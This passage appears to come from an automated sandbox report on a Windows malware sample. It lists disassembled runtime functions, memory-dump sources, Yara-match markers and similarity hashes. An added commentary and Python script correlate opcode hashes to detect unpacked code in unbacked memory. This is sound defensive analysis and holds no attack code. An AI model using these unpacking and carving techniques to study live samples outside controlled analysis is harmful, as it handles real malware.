• _free.LIBCMT ref: 05BCF933
• _free.LIBCMT ref: 05BCF955
• _free.LIBCMT ref: 05BCF968
• _free.LIBCMT ref: 05BCF976
• _free.LIBCMT ref: 05BCF981
• _free.LIBCMT ref: 05BCF9B9
• _free.LIBCMT ref: 05BCF9C0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF9DD
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCF9F5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction ID: 74677cb0ba7fccb9a1ba9c33869fee70335c492af8e778f5dbd21e6e6bd48526
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B314F31A04205AFDF319E79D848F6ABBEAFF40214F2044DEE49ADB150EFB1F9418619
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
• Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
• Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
• Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: DecodePointer
• String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-940912563
• Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
• Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
• Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
• Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00416C39
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 00416C45
• _free.LIBCMT ref: 00416C50
• _free.LIBCMT ref: 00416C5B
• _free.LIBCMT ref: 00416C66
• _free.LIBCMT ref: 00416C71
• _free.LIBCMT ref: 00416C7C
• _free.LIBCMT ref: 00416C87
• _free.LIBCMT ref: 00416C92
• _free.LIBCMT ref: 00416CA0
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
• Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 05BC6EA0
  • Part of subcall function 05BC6501: HeapFree.KERNEL32(00000000,00000000,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?), ref: 05BC6517
  • Part of subcall function 05BC6501: GetLastError.KERNEL32(?,?,05BCF3B8,?,00000000,?,00000000,?,05BCF65C,?,00000007,?,?,05BCFA50,?,?), ref: 05BC6529
• _free.LIBCMT ref: 05BC6EAC
• _free.LIBCMT ref: 05BC6EB7
• _free.LIBCMT ref: 05BC6EC2
• _free.LIBCMT ref: 05BC6ECD
• _free.LIBCMT ref: 05BC6ED8
• _free.LIBCMT ref: 05BC6EE3
• _free.LIBCMT ref: 05BC6EEE
• _free.LIBCMT ref: 05BC6EF9
• _free.LIBCMT ref: 05BC6F07
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction ID: 2fb9dd138f7b907516465e2e41b66faa69006ee3a724fc69478ed121dd07104c
• Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction Fuzzy Hash: 8011B376A0010CBFCB11EF98C845DD93FA5EF04354B6184E9FA0A8F235DA32FA509B85
Uniqueness
• Uniqueness Score: -1.00%
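The record above is the second occurrence of Opcode ID 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9 on this page: the same hash is reported at 00416C39 in the PE-backed image (base 00400000) and at 05BC6EA0 in the non-PE-backed region at 05BB0000, with different Instruction IDs. That is the pattern a reviewer looks for when a report flags unpacking: image code reappearing in allocated memory, rebased. The Python below is an added example, not Joe Sandbox's own tooling. It parses the plain-text record layout shown on this page (an assumption about the format; only the `APIs`, `ref:`, `Source File`, `Opcode ID` and `Instruction ID` lines are read) and correlates Opcode IDs across dump sources. It treats Opcode ID as an operand-independent hash and Instruction ID as operand-dependent, which is what the field names indicate; the report does not document the hashing, so that is an assumption too. The embedded input is constructed from four records on this page.

```python
import re
from collections import defaultdict

# Constructed input: four function records copied from this report page, trimmed
# to the lines the correlation reads. Not produced by the sandbox itself.
REPORT_EXCERPT = """\
APIs
• _free.LIBCMT ref: 05BCF8F1
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Similarity
• Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction ID: 74677cb0ba7fccb9a1ba9c33869fee70335c492af8e778f5dbd21e6e6bd48526
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
• Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
APIs
• _free.LIBCMT ref: 00416C39
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
Memory Dump Source
• Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Similarity
• Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
APIs
• _free.LIBCMT ref: 05BC6EA0
Memory Dump Source
• Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
Similarity
• Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction ID: 2fb9dd138f7b907516465e2e41b66faa69006ee3a724fc69478ed121dd07104c
"""

REF_RE = re.compile(r"\bref: ([0-9A-F]{8})\b")
SRC_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-F]{8}), based on PE: (true|false)")
OPCODE_RE = re.compile(r"Opcode ID: ([0-9a-f]{64})")
INSTR_RE = re.compile(r"Instruction ID: ([0-9a-f]{64})")


def parse_records(text):
    """Split the report text into one record per 'APIs' heading and extract the
    top-level API refs, the dump source, and the two similarity hashes."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"refs": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        if "Part of subcall function" in line:
            continue  # a callee's ref does not locate this function
        if (m := REF_RE.search(line)):
            cur["refs"].append(int(m.group(1), 16))
        elif (m := SRC_RE.search(line)):
            cur["dump"], cur["base"] = m.group(1), int(m.group(2), 16)
            cur["pe_backed"] = m.group(3) == "true"
        elif (m := OPCODE_RE.search(line)):
            cur["opcode_id"] = m.group(1)
        elif (m := INSTR_RE.search(line)):
            cur["instruction_id"] = m.group(1)
    return records


def find_cross_region_copies(records):
    """Return {opcode_id: [entry, ...]} for every Opcode ID that occurs both in a
    PE-backed image dump and in a non-PE-backed region. Each entry carries the
    region base, the function's offset from that base (its first top-level ref)
    and the Instruction ID, so a rebased copy is visible as 'same opcode hash,
    different instruction hash, different offset'."""
    by_opcode = defaultdict(list)
    for r in records:
        if all(k in r for k in ("opcode_id", "base", "pe_backed")) and r["refs"]:
            by_opcode[r["opcode_id"]].append(r)
    hits = {}
    for opcode_id, group in by_opcode.items():
        backed = [r["pe_backed"] for r in group]
        if any(backed) and not all(backed):
            hits[opcode_id] = [
                {"base": r["base"], "pe_backed": r["pe_backed"],
                 "offset": r["refs"][0] - r["base"],
                 "instruction_id": r.get("instruction_id")}
                for r in group]
    return hits


if __name__ == "__main__":
    for opcode_id, entries in find_cross_region_copies(parse_records(REPORT_EXCERPT)).items():
        print(f"Opcode ID {opcode_id[:16]}... seen in both image and unbacked memory:")
        for e in entries:
            kind = "PE image" if e["pe_backed"] else "private region"
            print(f"  base {e['base']:08X} ({kind}) +{e['offset']:X}  "
                  f"instruction ID {e['instruction_id'][:16]}...")
```

Run as-is it reports the one shared hash: offset +16C39 in the image versus +16EA0 in the 05BB0000 region. The offsets differ, so a byte-for-byte or RVA-based comparison would miss the copy; keying on the operand-independent hash is what makes the match. The unbacked region is also the one carrying the Yara matches above, which makes it the dump to carve first when extracting the configuration the report says it found.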

APIs
• __EH_prolog.LIBCMT ref: 004011B5
• std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
  • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
  • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
• std::bad_exception::bad_exception.LIBCMT ref: 00401225
• __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
• std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                                                  • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB43F5
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05BB4404
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 05BB441B
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BB1590
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB15AA
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 05BB4424
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 05BB4455
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05BB446B
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB4491
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID: {wB
                                                                                                                                                                                                                                  • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                  • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction ID: 572c15bab2398959b2223d46bb98cf12b8bc89b898a0e2e46b9d035d17d0405b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40119072A001149BDF15EBA8DC49AFD7776FF84210F1445A9E812B7290EFF4BA01C7A1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB3656
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05BB3665
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 05BB367C
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BB1590
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB15AA
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 05BB3685
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 05BB36B6
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05BB36CC
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB36F2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID: {wB
                                                                                                                                                                                                                                  • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: 55ee941de31098713661a4e5ca7ab9acfdc294cc2dc46e5757e0a2d88f5649cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4411A372E001249BDB15EBA8CC58AFE7BB5EF84350F1405A9E412B7290DBF4BA04C7A4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 05BB3861
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 05BB3870
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 05BB3887
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::_Lockit.LIBCPMT ref: 05BB1590
                                                                                                                                                                                                                                    • Part of subcall function 05BB157F: std::_Lockit::~_Lockit.LIBCPMT ref: 05BB15AA
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 05BB3890
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 05BB38C1
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 05BB38D7
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB38FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID: {wB
                                                                                                                                                                                                                                  • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                  • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction ID: 18597a33dd5b92b1e2c5dc5e01426819e0a1a0be91a2262daeb4c851affce230
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC11A772E001289BDB15EBA4CC48AFDB7B5EF84710F1445AAE415B7290DFF4B904C7A1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                  • Instruction ID: 91ae703abf9250064134bb72a4a56c2997fb2623f6fa96381118bf4dda39b025
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26e97803392628a66f226ceeca960576ab6ae59f7b73d64c31b09e82fec4626e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74C1BF75A09249AFEB11DFA8C884BADBFB1BF09310F0941DDE441A7391CB34B941CB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: GetLastError.KERNEL32(?,?,05BBE697,?,?,?,05BBED94,?), ref: 05BC6F84
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _free.LIBCMT ref: 05BC6FB7
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: SetLastError.KERNEL32(00000000), ref: 05BC6FF8
                                                                                                                                                                                                                                    • Part of subcall function 05BC6F80: _abort.LIBCMT ref: 05BC6FFE
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 05BC4F5B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC4FCC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC4FE5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5017
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC5020
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BC502C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction ID: ab24d792bfbb3046242da5962960fb44ff564477dad30d1776fada7427cefab9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb8600919e0bc0bfd4afc96a1d1b02341e3be43e8f324f1b28cbb9493ad17bb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82B15775A0161A9FDB24DF18C898AADBBB5FB08305F1045EED84AA7350E730BE80CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3864826663-0
